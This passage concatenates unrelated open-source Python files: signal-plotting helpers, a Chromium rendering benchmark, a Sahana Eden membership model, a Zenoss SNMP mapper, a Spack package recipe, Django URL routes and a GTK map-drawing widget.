stft_data[start_time_bin:stop_time_bin, start_freq_bin:stop_freq_bin].T, origin='lower', aspect='auto', interpolation='nearest') if colorbar_label: cb = plt.colorbar(spectrogram, ax=plot_axis) cb.ax.tick_params(labelsize=colorbar_fontsize) cb.set_label(colorbar_label) spectrogram.set_extent([start_time_plot, stop_time_plot, start_freq_plot, stop_freq_plot]) if plot_title: plot_axis.set_title(plot_title) if plot_xlabel: plot_axis.set_xlabel(plot_xlabel) if plot_ylabel: plot_axis.set_ylabel(plot_ylabel) return spectrogram def plot_peak_hold(axis, stft_data, frequency_array, title=False, xlabel=False, ylabel=False, plot_freq_limits=False, plot_amp_limits=False, limit_array=False, trace_label=False): """Plot the peak hold for a 2D STFT array Args: axis: matplotlip axis that this plot should be added to stft_data: A 2D numpy ndarray of shape (time, freq) containing the amplitude over both freq and time. frequency_array: A 1D numpy ndarray containing hte frequencies in Hz of the stft_data. title: An optional title to be added to the plot xlabel: An optional x-axis label to be added to the plot ylabel: An optional y-axis label to be added to the plot plot_freq_limits: An optional tuple containing the starting and ending frequencies to be used in the plot limit_array: An optional 1D numpy ndarray containing the limits for the plotted data of dtype = [('frequency', 'f8'), ('amplitude', 'f8')] Returns: matplolib handle to the axis Raises: """ peak_hold = calculate_peak_hold(stft_data, frequency_array) if trace_label is not False: axis.loglog(peak_hold['frequency'], peak_hold['amplitude'], label=trace_label) else: axis.loglog(peak_hold['frequency'], peak_hold['amplitude']) if limit_array is not False: axis.loglog(limit_array['frequency'], limit_array['amplitude']) if plot_freq_limits is not False: axis.set_xlim(plot_freq_limits) if plot_amp_limits is not False: axis.set_ylim(plot_amp_limits) if title is not False: axis.set_title(title) if xlabel is not False: axis.set_xlabel(xlabel) if ylabel is not False: axis.set_ylabel(ylabel) axis.xaxis.set_major_formatter(plt.FormatStrFormatter('%g')) axis.yaxis.set_major_formatter(plt.FormatStrFormatter('%g')) axis.grid(b=True, which='major', color='0.25', linestyle='-') axis.grid(b=True, which='minor', color='0.75', linestyle='-') axis.set_axisbelow(True) def single_frequency_over_time(stft_data, freq_array, time_array, frequency): """Determine the amplitude vs. time for a particular frequency Given an STFT data array and its supporting frequency and time arrays, as well as a desired frequency, determine the amplitude for just that frequency. Args: stft_data: A 2D numpy ndarray containing the amplitude vs. frequency vs. time from a Short-Time Fourier Transform. freq_array: A 1D numpy ndarray containing the frequencies in Hz for the given STFT data. time_array: A 1D numpy ndarray containing the time values in seconds for the given STFT data. frequency: A float or int of the desired frequency Returns: A 1D numpy structured array of dtype [('time', 'f8'), ('amplitude', 'f8')] Raises: IndexError: The size of the STFT does not match the given frequency and/or time arrays. """ # Check that the arrays are the correct size if freq_array.size != stft_data.shape[1]: raise IndexError('The size of the freq_array does not match ' 'the STFT data.') if time_array.size != stft_data.shape[0]: raise IndexError('The size of the time_array does not match ' 'the STFT data.') # Create the array to return the time and amplitude data_type = np.dtype([('time', 'f8'), ('amplitude', 'f8')]) stft_at_frequency = np.zeros(time_array.size, dtype=data_type) stft_at_frequency['time'] = time_array freq_bin = int(frequency / (freq_array[1] - freq_array[0])) stft_at_frequency['amplitude'] = stft_data[:, freq_bin] return stft_at_frequency
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import sys import time from telemetry.core.util import TimeoutException from telemetry.page import page_measurement from telemetry.page import page_test class RasterizeAndRecordMicro(page_measurement.PageMeasurement): def __init__(self): super(RasterizeAndRecordMicro, self).__init__('') self._chrome_branch_number = None @classmethod def AddCommandLineArgs(cls, parser): parser.add_option('--start-wait-time', type='float', default=2, help='Wait time before the benchmark is started ' '(must be long enought to load all content)') parser.add_option('--rasterize-repeat', type='int', default=100, help='Repeat each raster this many times. Increase ' 'this value to reduce variance.') parser.add_option('--record-repeat', type='int', default=100, help='Repeat each record this many times. Increase ' 'this value to reduce variance.') parser.add_option('--timeout', type='int', default=120, help='The length of time to wait for the micro ' 'benchmark to finish, expressed in seconds.') parser.add_option('--report-detailed-results', action='store_true', help='Whether to report additional detailed results.') def CustomizeBrowserOptions(self, options): options.AppendExtraBrowserArgs([ '--enable-impl-side-painting', '--force-compositing-mode', '--enable-threaded-compositing', '--enable-gpu-benchmarking' ]) def DidStartBrowser(self, browser): # TODO(vmpstr): Remove this temporary workaround when reference build has # been updated to branch 1713 or later. backend = browser._browser_backend # pylint: disable=W0212 self._chrome_branch_number = getattr(backend, 'chrome_branch_number', None) if (not self._chrome_branch_number or (sys.platform != 'android' and self._chrome_branch_number < 1713)): raise page_test.TestNotSupportedOnPlatformFailure( 'rasterize_and_record_micro requires Chrome branch 1713 ' 'or later. Skipping measurement.') def MeasurePage(self, page, tab, results): try: tab.WaitForJavaScriptExpression("document.readyState == 'complete'", 10) except TimeoutException: pass time.sleep(self.options.start_wait_time) record_repeat = self.options.record_repeat rasterize_repeat = self.options.rasterize_repeat # Enqueue benchmark tab.ExecuteJavaScript(""" window.benchmark_results = {}; window.benchmark_results.done = false; window.benchmark_results.id = chrome.gpuBenchmarking.runMicroBenchmark( "rasterize_and_record_benchmark", function(value) { window.benchmark_results.done = true; window.benchmark_results.results = value; }, { "record_repeat_count": """ + str(record_repeat) + """, "rasterize_repeat_count": """ + str(rasterize_repeat) + """ }); """) benchmark_id = tab.EvaluateJavaScript('window.benchmark_results.id') if (not benchmark_id): raise page_measurement.MeasurementFailure( 'Failed to schedule rasterize_and_record_micro') tab.WaitForJavaScriptExpression( 'window.benchmark_results.done', self.options.timeout) data = tab.EvaluateJavaScript('window.benchmark_results.results') pixels_recorded = data['pixels_recorded'] record_time = data['record_time_ms'] pixels_rasterized = data['pixels_rasterized'] rasterize_time = data['rasterize_time_ms'] results.Add('pixels_recorded', 'pixels', pixels_recorded) results.Add('record_time', 'ms', record_time) results.Add('pixels_rasterized', 'pixels', pixels_rasterized) results.Add('rasterize_time', 'ms', rasterize_time) # TODO(skyostil): Remove this temporary workaround when reference build has # been updated to branch 1931 or later. if ((self._chrome_branch_number and self._chrome_branch_number >= 1931) or sys.platform == 'android'): record_time_sk_null_canvas = data['record_time_sk_null_canvas_ms'] record_time_painting_disabled = data['record_time_painting_disabled_ms'] record_time_skrecord = data['record_time_skrecord_ms'] results.Add('record_time_sk_null_canvas', 'ms', record_time_sk_null_canvas) results.Add('record_time_painting_disabled', 'ms', record_time_painting_disabled) results.Add('record_time_skrecord', 'ms', record_time_skrecord) if self.options.report_detailed_results: pixels_rasterized_with_non_solid_color = \ data['pixels_rasterized_with_non_solid_color'] pixels_rasterized_as_opaque = \ data['pixels_rasterized_as_opaque'] total_layers = data['total_layers'] total_picture_layers = data['total_picture_layers'] total_picture_layers_with_no_content = \ data['total_picture_layers_with_no_content'] total_picture_layers_off_screen = \ data['total_picture_layers_off_screen'] results.Add('pixels_rasterized_with_non_solid_color', 'pixels', pixels_rasterized_with_non_solid_color) results.Add('pixels_rasterized_as_opaque', 'pixels', pixels_rasterized_as_opaque) results.Add('total_layers', 'count', total_layers) results.Add('total_picture_layers', 'count', total_picture_layers) results.Add('total_picture_layers_with_no_content', 'count', total_picture_layers_with_no_content) results.Add('total_picture_layers_off_screen', 'count', total_picture_layers_off_screen)
# -*- coding: utf-8 -*- """ Sahana Eden Members Model @copyright: 2012-15 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __all__ = ("S3MembersModel", "S3MemberProgrammeModel", "member_rheader" ) import datetime from gluon import * from gluon.storage import Storage from ..s3 import * from s3layouts import S3AddResourceLink # ============================================================================= class S3MembersModel(S3Model): """ """ names = ("member_membership_type", "member_membership", "member_membership_id", ) def model(self): T = current.T db = current.db auth = current.auth s3 = current.response.s3 organisation_id = self.org_organisation_id ADMIN = current.session.s3.system_roles.ADMIN is_admin = auth.s3_has_role(ADMIN) add_components = self.add_components configure = self.configure crud_strings = s3.crud_strings define_table = self.define_table root_org = auth.root_org() if is_admin: filter_opts = () elif root_org: filter_opts = (root_org, None) else: filter_opts = (None,) # --------------------------------------------------------------------- # Membership Types # tablename = "member_membership_type" define_table(tablename, Field("name", notnull=True, length=64, label = T("Name"), ), # Only included in order to be able to set # realm_entity to filter appropriately organisation_id(default = root_org, readable = is_admin, writable = is_admin, ), s3_comments(label = T("Description"), comment = None, ), *s3_meta_fields()) ADD_MEMBERSHIP_TYPE = T("Create Membership Type") crud_strings[tablename] = Storage( label_create = ADD_MEMBERSHIP_TYPE, title_display = T("Membership Type Details"), title_list = T("Membership Types"), title_update = T("Edit Membership Type"), title_upload = T("Import Membership Types"), label_list_button = T("List Membership Types"), label_delete_button = T("Delete Membership Type"), msg_record_created = T("Membership Type added"), msg_record_modified = T("Membership Type updated"), msg_record_deleted = T("Membership Type deleted"), msg_list_empty = T("No membership types currently registered")) represent = S3Represent(lookup=tablename, translate=True) membership_type_id = S3ReusableField("membership_type_id", "reference %s" % tablename, label = T("Type"), ondelete = "SET NULL", represent = represent, requires = IS_EMPTY_OR( IS_ONE_OF(db, "member_membership_type.id", represent, filterby="organisation_id", filter_opts=filter_opts)), sortby = "name", comment=S3AddResourceLink(f="membership_type", label=ADD_MEMBERSHIP_TYPE, title=ADD_MEMBERSHIP_TYPE, tooltip=T("Add a new membership type to the catalog.")), ) configure(tablename, deduplicate = self.member_type_duplicate, ) # --------------------------------------------------------------------- # Members # tablename = "member_membership" define_table(tablename, organisation_id( empty = False, requires = self.org_organisation_requires( updateable = True, ), ), Field("code", label = T("Member ID"), #readable = False, #writable = False, ), self.pr_person_id( comment = None, requires = IS_ADD_PERSON_WIDGET2(), widget = S3AddPersonWidget2(controller="member"), ), membership_type_id(), # History s3_date("start_date", label = T("Date Joined"), ), s3_date("end_date", label = T("Date resigned"), start_field = "member_membership_start_date", default_interval = 12, ), Field("membership_fee", "double", label = T("Membership Fee"), ), s3_date("membership_paid", label = T("Membership Paid"), ), Field("fee_exemption", "boolean", label = T("Exempted from Membership Fee"), default = False, # Expose in templates as needed: readable = False, writable = False, ), # Location (from pr_address component) self.gis_location_id(readable = False, writable = False, ), Field.Method("paid", self.member_membership_paid), *s3_meta_fields()) crud_strings[tablename] = Storage( label_create = T("Create Member"), title_display = T("Member Details"), title_list = T("Members"), title_update = T("Edit Member"), title_upload = T("Import Members"), label_list_button = T("List Members"), label_delete_button = T("Delete Member"), msg_record_created = T("Member added"), msg_record_modified = T("Member updated"), msg_record_deleted = T("Member deleted"), msg_list_empty = T("No Members currently registered")) # Which levels of Hierarchy are we using? levels = current.gis.get_relevant_hierarchy_levels() list_fields = ["person_id", "organisation_id", "membership_type_id", "start_date", # useful for testing the paid virtual field #"membership_paid", (T("Paid"), "paid"), (T("Email"), "email.value"), (T("Phone"), "phone.value"), ] report_fields = ["person_id", "membership_type_id", (T("Paid"), "paid"), "organisation_id", ] text_fields = ["membership_type_id", "organisation_id$name", "organisation_id$acronym", "person_id$first_name", "person_id$middle_name", "person_id$last_name", ] for level in levels: lfield = "location_id$%s" % level list_fields.append(lfield) report_fields.append(lfield) text_fields.append(lfield) if current.deployment_settings.get_org_branches(): org_filter = S3HierarchyFilter("organisation_id", # Can be unhidden in customise_xx_resource if there is a need to use a default_filter hidden = True, leafonly = False, ) else: org_filter = S3OptionsFilter("organisation_id", filter = True, header = "", # Can be unhidden in customise_xx_resource if there is a need to use a default_filter hidden = True, ) filter_widgets = [ S3TextFilter(text_fields, label = T("Search"), ), org_filter, S3OptionsFilter("membership_type_id", cols = 3, hidden = True, ), S3OptionsFilter("paid", cols = 3, label = T("Paid"), options = {T("paid"): T("paid"), T("overdue"): T("overdue"), T("expired"): T("expired"), #T("exempted"): T("exempted"), }, hidden = True, ), S3LocationFilter("location_id", label = T("Location"), levels = levels, hidden = True, ), ] report_options = Storage(rows = report_fields, cols = report_fields, facts = report_fields, defaults = Storage( cols = "membership.organisation_id", rows = "membership.membership_type_id", fact = "count(membership.person_id)", totals = True, ) ) configure(tablename, create_next = URL(f="person", args="address", vars={"membership.id": "[id]"}), deduplicate = self.member_duplicate, extra_fields = ("start_date", "membership_paid", "fee_exemption", ), filter_widgets = filter_widgets, list_fields = list_fields, onaccept = self.member_onaccept, report_options = report_options, # Default summary summary = [{"name": "addform", "common": True, "widgets": [{"method": "create"}], }, {"name": "table", "label": "Table", "widgets": [{"method": "datatable"}] }, {"name": "report", "label": "Report", "widgets": [{"method": "report", "ajax_init": True}] }, {"name": "map", "label": "Map", "widgets": [{"method": "map", "ajax_init": True}], }, ], update_realm = True, ) # Components self.add_components(tablename, # Contact Information pr_contact = (# Email {"name": "email", "link": "pr_person", "joinby": "id", "key": "pe_id", "fkey": "pe_id", "pkey": "person_id", "filterby": "contact_method", "filterfor": ("EMAIL",), }, # Phone {"name": "phone", "link": "pr_person", "joinby": "id", "key": "pe_id", "fkey": "pe_id", "pkey": "person_id", "filterby": "contact_method", "filterfor": ("SMS", "HOME_PHONE", "WORK_PHONE", ), }, ), hrm_programme = {"link": "member_membership_programme", "joinby": "membership_id", "key": "programme_id", }, ) represent = S3Represent(lookup=tablename, fields=["code"]) membership_id = S3ReusableField("membership_id", "reference %s" % tablename, label = T("Member"), ondelete = "CASCADE", represent = represent, requires = IS_ONE_OF(db, "member_membership.id", represent, ), ) # --------------------------------------------------------------------- # Pass names back to global scope (s3.*) # return dict(member_membership_id = membership_id) # ------------------------------------------------------------------------- @staticmethod def member_membership_paid(row): """ Whether the member has paid within 12 months of start_date anniversary @ToDo: Formula should come from the deployment_template """ T = current.T #try: # exempted = row["member_membership.fee_exemption"] #except AttributeError: # exempted = False #if excempted: # return T("exempted") try: start_date = row["member_membership.start_date"] except AttributeError: # not available start_date = None try: paid_date = row["member_membership.membership_paid"] except AttributeError: # not available paid_date = None if start_date: PAID = T("paid") OVERDUE = T("overdue") LAPSED = T("expired") lapsed = datetime.timedelta(days=183) # 6 months year = datetime.timedelta(days=365) now = current.request.utcnow.date() if not paid_date: # Never renewed since Membership started # => due within 1 year due = start_date + year if now < due: return PAID elif now > (due + lapsed): return LAPSED else: return OVERDUE now_month = now.month start_month = start_date.month if now_month > start_month: due = datetime.date(now.year, start_month, start_date.day) elif now_month == start_month: now_day = now.day start_day = start_date.day if now_day >= start_day: due = datetime.date(now.year, start_month, start_day) else: due = datetime.date((now.year - 1), start_month, start_day) else: # now_month < start_month due = datetime.date((now.year - 1), start_month, start_date.day) if paid_date >= due: return PAID elif (due - paid_date) > lapsed: return LAPSED else: return OVERDUE return current.messages["NONE"] # --------------------------------------------------------------------- @staticmethod def member_onaccept(form): """ On-accept for Member records """ db = current.db s3db = current.s3db auth = current.auth setting = current.deployment_settings utable = current.auth.settings.table_user ptable = s3db.pr_person ltable = s3db.pr_person_user mtable = db.member_membership # Get the full record _id = form.vars.id if _id: query = (mtable.id == _id) record = db(query).select(mtable.id, mtable.person_id, mtable.organisation_id, mtable.deleted, limitby=(0, 1)).first() else: return data = Storage() # Affiliation, record ownership and component ownership # @ToDo #s3db.pr_update_affiliations(mtable, record) # realm_entity for the pr_person record person_id = record.person_id person = Storage(id = person_id) if setting.get_auth_person_realm_member_org(): # Set pr_person.realm_entity to the human_resource's organisation pe_id organisation_id = record.organisation_id entity = s3db.pr_get_pe_id("org_organisation", organisation_id) if entity: auth.set_realm_entity(ptable, person, entity = entity, force_update = True) # Update the location ID from the Home Address atable = s3db.pr_address query = (atable.pe_id == ptable.pe_id) & \ (ptable.id == record.person_id) & \ (atable.type == 1) & \ (atable.deleted == False) address = db(query).select(atable.location_id, limitby=(0, 1)).first() if address: data.location_id = address.location_id # Add record owner (user) query = (ptable.id == record.person_id) & \ (ltable.pe_id == ptable.pe_id) & \ (utable.id == ltable.user_id) user = db(query).select(utable.id, utable.organisation_id, utable.site_id, limitby=(0, 1)).first() if user: data.owned_by_user = user.id if not data: return record.update_record(**data) # ------------------------------------------------------------------------- @staticmethod def member_duplicate(item): """ Member record duplicate detection, used for the deduplicate hook """ data = item.data person_id = data.get("person_id") organisation_id = data.get("organisation_id") table = item.table # 1 Membership record per Person<>Organisation query = (table.deleted != True) & \ (table.person_id == person_id) & \ (table.organisation_id == organisation_id) row = current.db(query).select(table.id, limitby=(0, 1)).first() if row: item.id = row.id item.method = item.METHOD.UPDATE # ------------------------------------------------------------------------- @staticmethod def member_type_duplicate(item): """ Membership Type duplicate detection, used for the deduplicate hook """ data = item.data name = data.get("name") organisation_id = data.get("organisation_id") table = item.table # 1 Membership Type per Name<>Organisation query = (table.deleted != True) & \ (table.name == name) & \ (table.organisation_id == organisation_id) row = current.db(query).select(table.id, limitby=(0, 1)).first() if row: item.id = row.id item.method = item.METHOD.UPDATE # ============================================================================= class S3MemberProgrammeModel(S3Model): """ Member Programmes Model """ names = ("member_membership_programme", ) def model(self): # --------------------------------------------------------------------- # Link between members and programmes # tablename = "member_membership_programme" self.define_table(tablename, self.hrm_programme_id(), self.member_membership_id(), *s3_meta_fields()) # --------------------------------------------------------------------- # Pass names back to global scope (s3.*) # return {} # ============================================================================= def member_rheader(r, tabs=[]): """ Resource headers for component views """ if r.representation != "html": # RHeaders only used in interactive views return None record = r.record if record is None: # List or Create form: rheader makes no sense here return None T = current.T resourcename = r.name # Tabs tabs = [(T("Person Details"), None), (T("Membership Details"), "membership"), (T("Addresses"), "address"), #(T("Contacts"), "contact"), (T("Contacts"), "contacts"), ] if resourcename == "membership": table = r.table ptable = current.s3db.pr_person query = (table.id == record.id) & \ (ptable.id == table.person_id) person = current.db(query).select(ptable.id, ptable.first_name, ptable.middle_name, ptable.last_name, limitby=(0, 1)).first() if person is not None: rheader_tabs = s3_rheader_tabs(r, tabs) rheader = DIV(DIV(s3_avatar_represent(person.id, "pr_person", _class="fleft"), _class="rheader-avatar", ), TABLE(TR(TH(s3_fullname(person))), ), rheader_tabs, ) else: rheader = None elif resourcename == "person": if current.deployment_settings.get_member_cv_tab(): tabs.append((T("CV"), "cv")) rheader_tabs = s3_rheader_tabs(r, tabs) rheader = DIV(DIV(s3_avatar_represent(record.id, "pr_person", _class="fleft"), _class="rheader-avatar", ), TABLE(TR(TH(s3_fullname(record))), ), rheader_tabs ) return rheader # END =========================================================================
################################################################################ # # This program is part of the HPMon Zenpack for Zenoss. # Copyright (C) 2008-2012 Egor Puzanov. # # This program can be used under the GNU General Public License version 2 # You can find full information here: http://www.zenoss.com/oss # ################################################################################ __doc__="""HPIdeControllerMap HPIdeControllerMap maps the cpqIdeControllerTable table to cpqIdeController objects $Id: HPIdeControllerMap.py,v 1.4 2012/10/11 18:57:43 egor Exp $""" __version__ = '$Revision: 1.4 $'[11:-2] from Products.DataCollector.plugins.CollectorPlugin import GetTableMap from Products.DataCollector.plugins.DataMaps import MultiArgs from HPExpansionCardMap import HPExpansionCardMap class HPIdeControllerMap(HPExpansionCardMap): """Map HP/Compaq insight manager cpqIdeControllerTable table to model.""" maptype = "cpqIdeController" modname = "ZenPacks.community.HPMon.cpqIdeController" snmpGetTableMaps = ( GetTableMap('cpqIdeControllerTable', '.1.3.6.1.4.1.232.14.2.3.1.1', { '.3': 'setProductKey', '.4': 'FWRev', '.5': 'slot', '.6': 'status', '.8': 'serialNumber', } ), ) def process(self, device, results, log): """collect snmp information from this device""" log.info('processing %s for device %s', self.name(), device.id) getdata, tabledata = results if not device.id in HPExpansionCardMap.oms: HPExpansionCardMap.oms[device.id] = [] for oid, card in tabledata.get('cpqIdeControllerTable', {}).iteritems(): try: om = self.objectMap(card) om.snmpindex = oid.strip('.') om.id = self.prepId("cpqIdeController%s" % om.snmpindex) om.slot = getattr(om, 'slot', 0) if om.slot == -1: om.slot = 0 if not getattr(om, 'setProductKey', ''): om.setProductKey = 'Standard IDE Controller' om.setProductKey = MultiArgs(om.setProductKey, om.setProductKey.split()[0]) except AttributeError: continue HPExpansionCardMap.oms[device.id].append(om) return
############################################################################## # Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC. # Produced at the Lawrence Livermore National Laboratory. # # This file is part of Spack. # Created by Todd Gamblin, [email protected], All rights reserved. # LLNL-CODE-647188 # # For details, see https://github.com/spack/spack # Please also see the NOTICE and LICENSE files for our notice and the LGPL. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License (as # published by the Free Software Foundation) version 2.1, February 1999. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and # conditions of the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ############################################################################## from spack import * class Freebayes(MakefilePackage): """Bayesian haplotype-based genetic polymorphism discovery and genotyping.""" homepage = "https://github.com/ekg/freebayes" version('1.1.0', git='https://github.com/ekg/freebayes.git', commit='39e5e4bcb801556141f2da36aba1df5c5c60701f', submodules=True) depends_on('cmake', type='build') depends_on('zlib') parallel = False def edit(self, spec, prefix): makefile = FileFilter('Makefile') b = prefix.bin makefile.filter('cp bin/freebayes bin/bamleftalign /usr/local/bin/', 'cp bin/freebayes bin/bamleftalign {0}'.format(b)) @run_before('install') def make_prefix_dot_bin(self): mkdir(prefix.bin)
#!/usr/bin/env python # -*- coding: utf-8 -*- from django.conf.urls import url, include from rest_framework import routers from . import ( views, ) router = routers.DefaultRouter() router.register(r'synchronizations', views.SynchronizationViewSet, base_name = 'synchronization') router.register(r'repositories', views.RepositoryViewSet, base_name = 'repository') router.register(r'presentations', views.PresentationViewSet, base_name = 'presentation') app_name = 'qraz' urlpatterns = [ url( r'^$', views.IndexView.as_view(), name='index' ), url( r'^presentations$', views.PresentationsView.as_view(), name='presentations' ), url( r'^repositories$', views.RepositoriesView.as_view(), name='repositories' ), url( r'^help$', views.HelpView.as_view(), name='help' ), url( r'^logout$', views.LogoutView.as_view(), name='logout' ), url( r'^api/', include(router.urls) ), url( r'^webhook/(?P<username>\w[\w_\-]+)/(?P<repository>[\w\-.]+)$', views.WebHookView.as_view(), name='webhook' ), url( r'^(?P<username>\w[\w_\-]+)/(?P<repository>\w[\w\-.]+)/(?P<presentation>\w[\w\-\._]+)/(?P<path>.*)?$', views.DownloadView.as_view(), name='download' ) ]
#!/usr/bin/env python # -*- coding: UTF-8 -*- ############################################################################### # MapWidget.py # # Drawds the MapConfig object. # # ----------------------------------------------------------------------------- # gpsmap - A GPSD simulator based on map positions # (C) 2014 Gerardo García Peña <[email protected]> # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the Free # Software Foundation; either version 3 of the License, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License # for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # ############################################################################### import pygtk pygtk.require('2.0') import gtk import cairo import logging import math import GPS import gobject class MapWidget(gtk.DrawingArea): """ This class is a Drawing Area""" __gsignals__ = { "expose-event": "override", } mc = None select_m = None select_x = None select_y = None visible = None ruler = None cp_radius = None def __init__(self, mc): super(MapWidget, self).__init__() self.cp_radius = 0 self.mc = mc self.select_m = None self.select_x = None self.select_y = None self.visible = { "ref_points": False, "points": False, "route": False, "background": 2, } gobject.timeout_add(100, self.do_animation) def bg_visible(self, action, value): self.visible["background"] = value.get_current_value() self.redraw() def is_visible(self, action, element): self.visible[element] = not self.visible[element] self.redraw() return self.visible[element] def ruler_set_start(self, x, y): self.ruler = [ x, y, x, y ] self.redraw() def ruler_set_end(self, x, y): self.ruler[2] = x self.ruler[3] = y self.redraw() def ruler_unset(self): self.ruler = None self.redraw() def redraw(self): self.alloc = self.get_allocation() rect = gtk.gdk.Rectangle(self.alloc.x, self.alloc.y, self.alloc.width, self.alloc.height) if self.window is not None: self.window.invalidate_rect(rect, True) def do_animation(self): if self.mc is None or self.mc.curr_xy is None: return True if self.cp_radius is None or self.cp_radius > 10: self.cp_radius = 0 else: self.cp_radius = self.cp_radius + 1 self.redraw() return True self.alloc = self.get_allocation() rect = gtk.gdk.Rectangle( self.alloc.x + int(self.mc.curr_xy[0]) - 15, self.alloc.y + int(self.mc.curr_xy[1]) - 15, 40, 40) if self.window is not None: self.window.invalidate_rect(rect, True) return True def do_draw(self, cr, draw_curr_xy): # copy image background cr.set_source_surface(self.mc.bg_surface, 0, 0) cr.paint() if self.visible["background"] != 2: cr.set_source_rgba(0, 0, 0, .5 if self.visible["background"] == 1 else .9) cr.rectangle(0, 0, self.mc.bg_w - 1, self.mc.bg_h - 1) cr.fill() cr.stroke() # draw route if self.visible["route"] and self.mc.route is not None: lp = None for p in self.mc.route: if lp is None: cr.set_source_rgba(0, 1, 0, 0.8) cr.arc(p[0], p[1], 10.0, 0, 2*math.pi) cr.fill() cr.stroke() else: cr.set_source_rgba(0, 1, 0, 0.9) cr.move_to(lp[0], lp[1]) cr.line_to(p[0], p[1]) cr.stroke() cr.set_source_rgba(0, 1, 0, 0.4) cr.arc(p[0], p[1], 10.0, 0, 2*math.pi) cr.fill() cr.stroke() lp = p # draw reference points if self.visible["ref_points"]: for p in [ self.mc.A, self.mc.H, self.mc.V ]: if p is not None: cr.set_source_rgba(0, 0, 0, 1) cr.set_line_width(4) cr.move_to(p[0][0] - 8 + 1, p[0][1] - 8 + 1) cr.line_to(p[0][0] + 8 + 1, p[0][1] + 8 + 1) cr.move_to(p[0][0] - 8 + 1, p[0][1] + 8 + 1) cr.line_to(p[0][0] + 8 + 1, p[0][1] - 8 + 1) cr.stroke() cr.set_line_width(3) cr.set_source_rgba(1, 0, 0, 0.8) cr.move_to(p[0][0] - 8, p[0][1] - 8) cr.line_to(p[0][0] + 8, p[0][1] + 8) cr.move_to(p[0][0] - 8, p[0][1] + 8) cr.line_to(p[0][0] + 8, p[0][1] - 8) cr.stroke() if self.visible["points"]: for n in self.mc.points.keys(): x, y = self.mc.points[n][0], self.mc.points[n][1] cr.set_source_rgba(0, 0, 1, .8) cr.set_line_width(2) cr.arc(x, y, 6.0, 0, 2*math.pi) cr.stroke() cr.arc(x, y, 4.0, 0, 2*math.pi) cr.fill() cr.stroke() xbearing, ybearing, width, height, xadvance, yadvance = (cr.text_extents(n)) cr.set_source_rgba(0, 0, 0, 1) cr.move_to(x + 1 - width/2, y + 1 + height) cr.show_text(n) cr.set_source_rgba(1, 1, 1, 1) cr.move_to(x - width/2, y + height) cr.show_text(n) cr.stroke() # draw selection if self.select_m is not None: if self.select_m == "H" or self.select_m == "A": cr.set_source_rgba(0, 0, 0, 1) cr.set_line_width(1) cr.move_to(0, self.select_y + 1) cr.line_to(self.mc.bg_w, self.select_y + 1) cr.stroke() cr.set_source_rgba(1, 1, 0, 0.7) cr.set_line_width(3) cr.move_to(0, self.select_y) cr.line_to(self.mc.bg_w, self.select_y) cr.stroke() if self.select_m == "V" or self.select_m == "A": cr.set_source_rgba(0, 0, 0, 1) cr.set_line_width(1) cr.move_to(self.select_x + 1, 0) cr.line_to(self.select_x + 1, self.mc.bg_h) cr.stroke() cr.set_source_rgba(1, 1, 0, 0.7) cr.set_line_width(3) cr.move_to(self.select_x, 0) cr.line_to(self.select_x, self.mc.bg_h) cr.stroke() if self.select_m == "P": cr.set_source_rgba(0, 0, 1, .4) cr.set_line_width(2) cr.arc(self.select_x, self.select_y, 4.0, 0, 2*math.pi) cr.stroke() cr.arc(self.select_x, self.select_y, 2.0, 0, 2*math.pi) cr.fill() cr.stroke() elif self.select_m != "A": cr.set_source_rgba(0, 0, 0, 1) cr.set_line_width(1) cr.move_to(self.select_x - 8 + 1, self.select_y - 8 + 1) cr.line_to(self.select_x + 8 + 1, self.select_y + 8 + 1) cr.move_to(self.select_x - 8 + 1, self.select_y + 8 + 1) cr.line_to(self.select_x + 8 + 1, self.select_y - 8 + 1) cr.stroke() cr.set_source_rgba(1, 1, 0, 0.7) cr.set_line_width(3) cr.move_to(self.select_x - 8, self.select_y - 8) cr.line_to(self.select_x + 8, self.select_y + 8) cr.move_to(self.select_x - 8, self.select_y + 8) cr.line_to(self.select_x + 8, self.select_y - 8) cr.stroke() # draw ruler if self.ruler is not None: cr.set_line_width(6) cr.set_source_rgba(0, 0, 0, 1) cr.move_to(self.ruler[0], self.ruler[1]) cr.line_to(self.ruler[2], self.ruler[3]) cr.stroke() cr.set_line_width(4) cr.set_source_rgba(0, 1, 0, 1) cr.set_dash([ 5.0 ], 0) cr.move_to(self.ruler[0], self.ruler[1]) cr.line_to(self.ruler[2], self.ruler[3]) cr.stroke() a = self.mc.pixel2coords(self.ruler[0], self.ruler[1]) b = self.mc.pixel2coords(self.ruler[2], self.ruler[3]) if a is None or b is None: distance = "???" else: distance = "%.2f m" % GPS.distance(a[0], a[1], b[0], b[1]) xbearing, ybearing, 